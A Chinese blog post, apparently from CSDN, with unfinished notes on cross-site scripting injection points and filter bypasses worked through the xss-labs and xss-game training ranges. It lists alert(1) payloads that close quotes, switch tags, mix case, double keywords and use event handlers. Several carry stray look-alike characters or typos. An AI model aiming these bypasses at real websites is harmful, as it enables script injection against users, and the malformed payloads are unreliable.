xss漏洞总结【插入位置】

最新推荐文章于 2024-04-23 21:44:55 发布
最新推荐文章于 2024-04-23 21:44:55 发布
阅读量976 收藏 4
点赞数
分类专栏: 漏洞篇 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45883910/article/details/121151833
版权

明天再更新:

使用靶场:xss-labs、https://xss-game.appspot.com

XSS可能出现的地方:

  • url的地址栏:
  • 搜索框:
  • 留言板:

绕过方法:

  • 换标签<a href >
  • 闭合双引号、
  • 大小写绕过、
  • 双写关键字、
  • 构造事件(onclick).

靶场:xss-labs

位置一:URL里

在这里插入图片描述

位置二:搜索框中

html属性中作为值;绕过方法:闭合。

"><script>alert(1)</script>

在这里插入图片描述

位置三:搜索框中

如下图:'<script>alert(1)</script>' 其中单引号被替换成双引号,特殊字符也被实体编码了。

特殊字符被过滤,但不对单引号转义,因此利用单引号闭合构造事件

'οnclick='alert(1)''

或者

'οnfοcus=alert('xss') >//

在这里插入图片描述

位置四:搜索框
尖括号被过滤了,所有考虑事件触发,用双引号闭合value属性。

"οnclick='alert(1)'"  或者:"οnfοcus='alert(1)'"

"οnfοcus=javascript:alert('xss') " // 或者"οnclick=javascript:alert('xss') " //

在这里插入图片描述

在这里插入图片描述

位置五:
特殊字符被替代,换标签继续:

"><a href=jiavascript:alert('1')>2</a>//

">:闭合前面标签。
<a href=javascript:alert('1')>2</a>:点击数字2,跳转到href执行弹窗命令。
//:注释后面的“>。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

位置六:搜索框
关键字过滤了:href、script、on
大小写绕过:"oNclick='alert(1)'" 使用双引号进行闭合。

"oNclick='alert(1)'"
或者"Onclick=javascript:alert('xss') " //
或者 "> <a HrEf=javascript:alert('xss') > xss</a> //

位置七:搜索框
关键字被删除,尝试双写

"onοnclick=javascript:alert('xss') " //

在这里插入图片描述

靶场:https://xss-game.appspot.com/

第一关:地址栏中:<script>alert(1)</script>

也可以使用反斜号绕过,遇到“()”被屏蔽时可以使用这种方式。${String}这是ES6新增的模板字符串方法新特性。

第二关:发布帖子:
<a href=javascript:alert(1)>xss</a>

第三关:

Bear :)
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户...
网络安全中的XSS攻击
lzhy666的博客
04-20 421
通过系列8中同源的策略我们知道,由于其非绝对性,能通过在页面嵌入跨域资源,通过cors来来允许跨源访问和通过js中的API来实现跨文档消息机制,这些机制同时带了很多安全问题。
XSS CSRF SQL注入 URL跳转漏洞 点击劫持 web安全
m0_37685866的博客
04-07 1093
CSRF,XSS,SQL注入,URL跳转漏洞,点击挟持等WEB安全问题
xss植入_XSS防御和绕过1
weixin_39670511的博客
12-21 199
原理:对用户输入没做过滤和处理,是用户可以输入一些东西(例如js),控制输出达到一些攻击目的1.DOM型基于DOM的XSS有时也称为type0XSS。当用户能够通过交互修改浏览器页面中的DOM(DocumentObjectModel)并显示在浏览器上时,就有可能产生这种漏洞,从效果上来说它也是反射型XSS。主要区别就是没有经过服务器后端处理通过修改页面的DOM节点形成的XSS,称之为DOMBase...
复现XSS漏洞及分析
qq_56724164的博客
09-04 380
XSS
网页脚本注入XSS漏洞
weixin_68681298的博客
07-21 270
第一次登陆后服务端以set-cookie方式下发cookie,在登陆后的访问中都可以使用该cookie而不需要重复登陆,cookie里面有一些标志性信息,如什么时候过期(expires、max-age)后者优先生效,用户信息和对什么网页生效(path)等,在url上面锁的标志即可查看。个人愚见:就是每次都需要去进行代码注入,注入后才可以去执行,执行后下一次需要的时候再去注入,就是每一次都进行注入才能进行执行,所以叫做反射型。Cookie的问题:下发过多占用客户端过多的存储空间,增加通信成本。
XSS漏洞简单概述--UGa
qq_52781120的博客
03-20 444
XSS漏洞简单概述–UGa 个人笔记向,请多指点 *简介 XSS作为OWASP TOP 10之一,XSS被称为跨站脚本攻击(Cross-site scripting) ,本来应该缩写为CSS,但是由于和CSS (Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(JS)完成恶意的攻击行为。JS可以非常灵活的操作html、css和浏览器,这使得XSS攻击的“想象”空间特别大。 XSS通过将精心构造的代码(J
XSS漏洞
weixin_45870282的博客
02-05 601
一般我们在判断是否存在xss的时候,会首先输入类似于下面的字符串:123456”’ 然后右键查看源代码,看我们输入的特殊字符串是否在页面中显示,如果没显示,则可能存在dom型xss,也有可能不存在xss.如果存在,重点看我们输入的特殊的字符是否被转义,如果没被转义,基本上可以判断存在xss,剩下的只是如何构造的问题.如果被转义了,则需要首先看是所有的都被转义了,还是部分,如果是部分,则考虑当前位置能否使用未转义的符号进行拼接.javaScript中的同源,需要对比 两者中的协议、域名、端口。
XSS发生的位置
一米八多的瑞兹的博客
12-23 1361
1. GET型URL中的XSS 如果在URL中提交的参数值,在页面中显示。很有可能就存在XSS。 2. POST型表单中的XSS 如果在表单中提交的参数值,在页面中显示。很有可能就存在XSS。 3. JSON中的XSS JSON(JavaScript Object Notation) 是一种轻量级的数据交换格式。易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。 JSON最常用的格式是对象的 键值对。例如下面这样:{“firstName”: “Brett”, “lastName”: “M
xss实验并对注入点、注入语句及危害知识总结
五分之一世纪
03-25 1612
<1>xss的概念 xss的英文名字是cross site script。俗称跨站脚本,是一种注入攻击,指攻击者在被攻击的网页上利用编写时的漏洞注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行的攻击方式叫做跨域脚本攻击。看xss的名字——“跨域脚本攻击”,思索名字可以发现“跨域”,那么什么是域?跨了什么域?其实这个域是指域名,在web中规定脚本只能在本域名上的不同路径上的文件中执行,而不能在不同域上执行,这个措施的实现就是根据同源策略。下面先用一个实验对xss的攻击流程做一个
web安全之XSS攻击原理及防范
m0_74131821的博客
04-20 1072
恶意攻击者在web页面中会插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌入到web页面中script代码会执行,因此会达到恶意攻击用户的目的
安全漏洞XSS攻击方法详解
01-26
XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web...
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
Input XSS最新漏洞及利用
06-12
如果当你在Input框中输入“”,并在新 页面的源代码中找到这对标签的话,那么基本上就说明它存在Input XSS漏洞;而“”则是它的可视化检测方式;如果“<script>alert(/xss/)”能够实现,则证明该页面可以实行脚本...
什么是 XSS 攻击?
m0_38066007的博客
04-23 63
XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。
pikachu-xss
最新发布
2303_81631620的博客
04-23 300
按原本的做法,应该先写一个script标签测试一下,但是发现有字符限制。
Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识
JINGWHALE
04-22 892
本文介绍了Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识。Web前端作为与用户直接交互的界面,其安全性问题直接关系到用户体验和数据安全。近年来,随着前端技术的快速发展,Web前端安全问题也日益凸显。因此,加强生产安全意识,深入理解并防范前端安全问题,对于保障整个Web应用的安全性至关重要。
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 955
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
xss漏洞src经验
07-27
根据引用\[1\]和引用\[2\]的内容,XSS漏洞是一种发生在前端页面的漏洞,主要是由于Web应用程序对输入和输出没有做合适的处理,导致恶意的JavaScript脚本被插入到HTML页面中,当被攻击者浏览页面时,这些脚本会被执行,从而实现攻击者的恶意目的,如获取cookie、监听键盘、窃取密码等。XSS漏洞可以分为反射型XSS、存储型XSS和DOM型XSS等不同类型。其中,反射型XSS是指恶意脚本通过URL参数传递给服务器,服务器将恶意脚本返回给浏览器执行;存储型XSS是指恶意脚本被存储在服务器端,当用户访问包含恶意脚本的页面时,脚本会被执行;DOM型XSS是指恶意脚本通过修改DOM元素来实现攻击。为了防护XSS漏洞,可以使用一些工具,如XSS平台beef,它可以帮助检测和防御XSS漏洞。引用\[3\]提供了更多关于XSS漏洞的详细信息。 #### 引用[.reference_title] - *1* *3* [web漏洞-xss漏洞](https://blog.csdn.net/qq_44312640/article/details/127791065)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [XSS漏洞详解](https://blog.csdn.net/m0_56822024/article/details/125692783)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值